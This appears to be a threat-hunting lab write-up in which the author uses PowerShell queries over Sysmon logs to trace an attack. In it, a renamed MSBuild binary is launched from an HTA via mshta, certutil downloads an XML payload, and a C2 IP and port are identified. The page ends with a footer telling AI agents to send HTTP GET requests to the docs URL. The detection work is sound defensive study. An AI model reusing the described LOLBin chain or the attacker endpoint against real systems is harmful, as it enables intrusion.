# Hunting .Net Malware ### Task 1. Has msbuild executed malware on the machine? \ A generic hunt is to look for any process creation, where the image of the process contains "msbuild.exe": To parse the logs using PowerShell and search for the presence of MSBuild, use the following PowerShell command ("$\_Properties\[4]" refers to the Image name field in Sysmon log with Event ID 1): ``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*msbuild*"} | fl ``` The output:

PowerShell returns no results. Was this it?

``` ``` The filename itself, alone, is a weak indicator as its easy to circumvent by simply renaming it. There are other options available, ranging from the file hash, other known fields or parameters. Observing MSBuild on a regular Windows 10 machine, well notice that the "Description" field is set to "MSBuild.exe". Let's utilize PowerShell and look for that in our data set ("$\_Properties\[6]" represents to the Description field in Sysmon log with Event ID 1): ``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[6].Value -like "*msbuild*"} | fl ```

Note that the binary image is "C:\Users\Public\Downloads\Windows\_Reporting.exe" which starts with a command line parameter of "Windows\_Reporting.xml". ### Task 2. What was the initial stager? \ Search for the presence of CMD (Command Prompt), use the following PowerShell command ("$\_Properties\[4]" refers to the Image name field in Sysmon log with Event ID 1): now focusing on the ParentImage and ParentCommandLine parameters: ``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*Cmd*"} | fl ```

The parent image is "mshta.exe", which has executed "report.hta". Based on the temporary location (of Microsoft Edge), we can conclude that the file was executed in a browser, which then started Windows\_Reporting.exe. The initial stager is an HTA file, however we are still not sure how and/or why MSBuild is renamed to Windows\_Reporting.exe and located in an odd location. ### Task 3. How was the malware downloaded? Why did the attacker choose this method? \ we know that MSBuild is present in an odd location under different name, and that an HTA file was used to execute the file. Since we know the file is called "Windows\_Reporting.exe", let's look at all process creation events that have referenced this file with the following command ("$\_.Properties\[10]" represents to the CommandLine field in Sysmon log with Event ID 1):
``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[10].Value -like "*Windows_Reporting.exe*"} | fl ```

event entry has logged the same HTA file copying MSBuild to C:\Users\Public\Downloads\Windows_Reporting.exe.

From the first task, we know that Windows\_Reporting.exe was executed with command line argument of "Windows\_Reporting.xml". To find out how that XML file was created, we will look into Sysmon event 11 - File create event. Execute the following command ("$\_.Properties\[5]" represents to the TargetFilename field in Sysmon log with Event ID 11):
``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=11} | Where-Object {$_.Properties[5].Value -like "*Windows_Reporting.xml*"} | fl ```

Let's review the information that Att\&ck has on certutil.exe [here](https://attack.mitre.org/software/S0160/). It states "certutil can be used to download files from a given URL". Following this information, we can dig up process creation events with certutil.exe with the following command: ``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*certutil.exe*"} | fl ```

It appears that certuti.exel was utilized to download the XML file from http://52.77.211.51:8443.

### Task 4. What was the attacker's IP and Port? Reviewing the discovered Windows\_Reporting.xml reveals the attacker's C2 IP and Port:

The same can be observed by Sysmon logs, in particular event id 3 filtering for Windows\_Reporting.exe with the following command ``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=3} | Where-Object {$_.Properties[4].Value -like "*Windows_Reporting.exe*"} | fl ```

``` Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=3} | Where-Object {$_.Properties[4].Value -like "*Windows_Reporting.exe*"} | fl | measure ``` Overall, there are 51 connections. \

\ \

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmedhat.gitbook.io/whoami/writesup/hunting-.net-malware.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.